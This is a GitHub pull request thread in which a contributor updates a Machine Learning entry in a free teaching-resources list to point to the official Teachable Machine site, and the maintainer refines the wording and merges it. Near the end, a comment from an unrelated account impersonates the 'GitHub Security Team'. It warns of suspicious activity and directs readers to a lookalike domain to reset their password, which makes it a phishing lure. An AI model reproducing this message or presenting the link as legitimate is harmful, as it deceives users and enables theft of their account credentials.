### PR TITLE
added video resource about teachable machines from @dale_on_ai

### PR DESCRIPTION
**Pull request by spencer1573**
Let me know if everything looks right! thanks!

### CODE REVIEW

**Comment by spencer1573** [comment]
this pr is a reference to [this issue #2 ](https://github.com/Soneji/awesome-teaching/issues/2) @Soneji

**Comment by Soneji** [comment]
Thanks for this, would you be able to instead of linking the instagram, link the actual tool? 😄

**Comment by spencer1573** [comment]
I added the official website for the tool. I hope that is what you were thinking. If there is anything else you need please let me know! thanks! @Soneji

File: README.md [hunk 1]
```diff
@@ -51,7 +51,8 @@ A repository of **free** awesome teaching resources, mainly for teaching coding
 
 ## Machine Learning
 
-- [Teachable Machines](https://www.instagram.com/tv/CGn-75ngGbX/?igshid=jpqqnpyf3auc) - A video from @dale_on_ai about teachable machines.
+- [Teachable Machines Official Website](https://teachablemachine.withgoogle.com/) - The official site for google's teachable machines learning model.
```
Comment (Soneji) [inline README.md]:
```suggestion
- [Teachable Machines Official Website](https://teachablemachine.withgoogle.com/) - Train a computer to recognize your own images, sounds, & poses. A fast, easy way to create machine learning models for your sites, apps, and more – no expertise or coding required.
```

**Comment by Soneji** [comment]
thanks @spencer1573

**Comment by Soneji** [comment]
Got this in before the end of hacktober for you 😉

**Comment by spencer1573** [comment]
thanks! @Soneji

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**

**Pull request merged**